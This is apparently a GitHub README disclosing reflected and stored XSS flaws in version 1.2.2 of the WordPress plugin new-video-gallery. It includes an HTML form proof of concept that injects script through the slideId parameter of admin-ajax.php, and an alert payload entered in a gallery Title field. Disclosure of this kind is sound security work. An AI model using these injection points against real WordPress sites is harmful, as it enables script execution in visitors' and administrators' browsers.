Detail

App: new-video-gallery
Verion: 1.2.2
Issue: xss

Detail

new-video-gallery is a Wordpress plugin for create YouTube Gallery & Create Vimeo Gallery into your WordPress site. In the version 1.2.2 there are some XSS issues.

At frist, in the file new-video-gallery/new-video-gallery.php:300 line, the function _ajax_video_gallery() can be controlled.

And then the function _vg_ajax_callback_function($id) will be sinked.

The PoC:

<html>
<body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.10.20.16:8888/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="video&#95;gallery&#95;js" />
      <input type="hidden" name="slideId" value="1&quot;&gt;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The other like a stored-xss Press Add Video Gallery and into this page then pressADD VIDEO BANNER.You can upload an image and write the payload on hte Title label.

Then press Publish And You will get a Shortcode.

Press the Shortcode in your page.

The xss will execute in the front page.

Poc
```
“><script>alert(2)</script><
```

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
1.png		1.png
2.png		2.png
3.png		3.png
4.png		4.png
5.png		5.png
6.png		6.png
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Detail

About

Releases

Packages

iohex/wpp_new-video-gallery

Folders and files

Latest commit

History

Repository files navigation

Detail

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages